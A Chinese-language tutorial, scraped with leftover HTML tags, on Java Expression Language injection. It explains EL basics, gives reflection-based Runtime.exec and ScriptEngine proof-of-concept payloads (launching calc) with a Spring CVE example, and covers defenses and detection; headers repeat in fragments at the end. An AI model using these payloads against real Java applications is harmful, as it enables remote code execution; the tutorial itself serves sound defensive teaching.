EL表达式注入漏洞深入分析与防御<\/h1>

0x01 EL表达式基础<\/h2>

EL简介<\/h3>

EL(Expression Language)是为了简化JSP开发而设计的表达式语言，灵感来源于ECMAScript和XPath。主要功能包括：<\/p>

获取数据：从Web域中检索Java对象、获取数据<\/li>
执行运算：支持关系运算、逻辑运算和算术运算<\/li>
获取Web开发常用对象：提供隐式对象引用<\/li>

调用Java方法：允许通过自定义EL函数调用Java类方法<\/li> <\/ul>

基本语法<\/h3>

EL表达式格式：${EL表达式}<\/code><\/p>

变量访问范围<\/strong>：<\/p>


不指定范围时查找顺序：page → request → session → application<\/li>
显式指定范围：${pageScope.userinfo}<\/code>、${requestScope.userinfo}<\/code>等<\/li>
<\/ul>
运算符<\/strong>：<\/p>

.<\/code>和[]<\/code>运算符：${user.My-Name}<\/code>应写为${user["My-Name"]}<\/code><\/li>
[]<\/code>支持动态取值：${sessionScope.user[data]}<\/code><\/li>
<\/ul>
隐式对象<\/h3>



对象<\/th>
描述<\/th>
等效Java代码<\/th>
<\/tr>
<\/thead>


pageContext<\/td>
JSP页面上下文<\/td>
pageContext<\/td>
<\/tr>

param<\/td>
请求参数<\/td>
request.getParameter(name)<\/td>
<\/tr>

paramValues<\/td>
请求参数数组<\/td>
request.getParameterValues(name)<\/td>
<\/tr>

header<\/td>
请求头<\/td>
request.getHeader(name)<\/td>
<\/tr>

headerValues<\/td>
请求头数组<\/td>
request.getHeaders(name)<\/td>
<\/tr>

cookie<\/td>
Cookie对象<\/td>
request.getCookies()<\/td>
<\/tr>

initParam<\/td>
上下文初始化参数<\/td>
servletContext.getInitParameter(name)<\/td>
<\/tr>
<\/tbody>
<\/table>
0x02 EL表达式注入漏洞原理<\/h2>
漏洞成因<\/h3>
当外部可控输入被直接拼接到EL表达式中执行时，攻击者可构造恶意表达式实现任意代码执行。<\/p>
典型利用场景<\/h3>

Java代码中动态构造EL表达式<\/li>
框架层面服务端执行的EL表达式外部可控<\/li>
<\/ol>
通用PoC<\/h3>
\/\/ 获取Web路径
<\/span><\/span><\/span><\/span>${<\/span>pageContext.<\/span>getSession<\/span>().<\/span>getServletContext<\/span>().<\/span>getClassLoader<\/span>().<\/span>getResource<\/span>(<\/span>""<\/span>)}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 执行命令
<\/span><\/span><\/span><\/span>${<\/span>pageContext.<\/span>request<\/span>.<\/span>getSession<\/span>().<\/span>setAttribute<\/span>(<\/span>"a"<\/span>,<\/span>pageContext.<\/span>request<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>).<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>,<\/span>null<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span>null<\/span>).<\/span>exec<\/span>(<\/span>"calc"<\/span>).<\/span>getInputStream<\/span>())}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 简化版命令执行
<\/span><\/span><\/span><\/span>${<\/span>''<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>).<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span>""<\/span>.<\/span>getClass<\/span>()).<\/span>invoke<\/span>(<\/span>""<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>).<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>),<\/span>"calc.exe"<\/span>)}<\/span>
<\/span><\/span><\/code><\/pre>0x03 实际案例分析<\/h2>
CVE-2011-2730<\/h3>
Spring框架中的EL表达式注入：<\/p>
<spring:message text="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')}"><\/spring:message>
<\/code><\/pre>
JUEL实现中的EL注入<\/h3>
import<\/span> de.odysseus.el.ExpressionFactoryImpl;<\/span>
<\/span><\/span>import<\/span> javax.el.ExpressionFactory;<\/span>
<\/span><\/span>import<\/span> javax.el.ValueExpression;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        ExpressionFactory factory =<\/span> new<\/span> ExpressionFactoryImpl();<\/span>
<\/span><\/span>        String exp =<\/span> "${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')}"<\/span>;<\/span>
<\/span><\/span>        ValueExpression ve =<\/span> factory.<\/span>createValueExpression<\/span>(<\/span>exp,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>ve.<\/span>getValue<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x04 绕过技术<\/h2>
反射机制绕过<\/h3>
${<\/span>''<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>)<\/span>
<\/span><\/span> .<\/span>getMethod<\/span>(<\/span>'<\/span>exec','<\/span>'<\/span>.<\/span>getClass<\/span>())<\/span>
<\/span><\/span> .<\/span>invoke<\/span>(<\/span>''<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>)<\/span>
<\/span><\/span> .<\/span>getMethod<\/span>(<\/span>'<\/span>getRuntime'<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>),<\/span>'<\/span>calc.<\/span>exe<\/span>'<\/span>)}<\/span>
<\/span><\/span><\/code><\/pre>ScriptEngine调用JS引擎<\/h3>
${<\/span>''<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"javax.script.ScriptEngineManager"<\/span>)<\/span>
<\/span><\/span> .<\/span>newInstance<\/span>().<\/span>getEngineByName<\/span>(<\/span>"JavaScript"<\/span>)<\/span>
<\/span><\/span> .<\/span>eval<\/span>(<\/span>"java.lang.Runtime.getRuntime().exec('calc')"<\/span>)}<\/span>
<\/span><\/span><\/code><\/pre>0x05 防御措施<\/h2>


输入验证<\/strong>：<\/p>

避免直接使用外部输入作为EL表达式内容<\/li>
严格过滤EL表达式中的危险关键字和特殊字符<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

全局禁用EL：在web.xml中添加<\/li>
<\/ul>
<jsp-config><\/span>
<\/span><\/span>  <jsp-property-group><\/span>
<\/span><\/span>    <url-pattern><\/span>*.jsp<\/url-pattern><\/span>
<\/span><\/span>    <el-ignored><\/span>true<\/el-ignored><\/span>
<\/span><\/span>  <\/jsp-property-group><\/span>
<\/span><\/span><\/jsp-config><\/span>
<\/span><\/span><\/code><\/pre>
单个文件禁用：<%@ page isELIgnored="true" %><\/code><\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

检查JUEL相关代码：<\/li>
<\/ul>
javax.<\/span>el<\/span>.<\/span>ExpressionFactory<\/span>.<\/span>createValueExpression<\/span>()<\/span>
<\/span><\/span>javax.<\/span>el<\/span>.<\/span>ValueExpression<\/span>.<\/span>getValue<\/span>()<\/span>
<\/span><\/span><\/code><\/pre><\/li>

最小权限原则<\/strong>：<\/p>

限制EL表达式的执行权限<\/li>
使用安全管理器限制危险操作<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 检测方法<\/h2>


黑盒测试<\/strong>：<\/p>

尝试注入简单EL表达式如${1+1}<\/code><\/li>
测试参数、头、cookie等输入点<\/li>
<\/ul>
<\/li>

白盒审计<\/strong>：<\/p>

搜索EL表达式动态构建代码<\/li>
检查ExpressionFactory的使用情况<\/li>
<\/ul>
<\/li>
<\/ol>
附录：EL表达式速查表<\/h2>



类别<\/th>
表达式示例<\/th>
说明<\/th>
<\/tr>
<\/thead>


基本<\/td>
${variable}<\/code><\/td>
变量引用<\/td>
<\/tr>

运算<\/td>
${1+2}<\/code><\/td>
算术运算<\/td>
<\/tr>

关系<\/td>
${a > b}<\/code><\/td>
关系运算<\/td>
<\/tr>

逻辑<\/td>
${a && b}<\/code><\/td>
逻辑运算<\/td>
<\/tr>

方法<\/td>
${object.method()}<\/code><\/td>
方法调用<\/td>
<\/tr>

集合<\/td>
${list[0]}<\/code><\/td>
集合访问<\/td>
<\/tr>

隐式<\/td>
${param.name}<\/code><\/td>
请求参数<\/td>
<\/tr>
<\/tbody>
<\/table>
通过全面理解EL表达式的工作原理和潜在风险，开发人员可以更有效地预防和防御EL表达式注入漏洞。<\/p>

EL表达式注入漏洞深入分析与防御<\/h1>

0x01 EL表达式基础<\/h2>

0x02 EL表达式注入漏洞原理<\/h2>

漏洞成因<\/h3> 当外部可控输入被直接拼接到EL表达式中执行时，攻击者可构造恶意表达式实现任意代码执行。<\/p>

0x03 实际案例分析<\/h2>

0x04 绕过技术<\/h2>

漏洞成因<\/h3>
当外部可控输入被直接拼接到EL表达式中执行时，攻击者可构造恶意表达式实现任意代码执行。<\/p>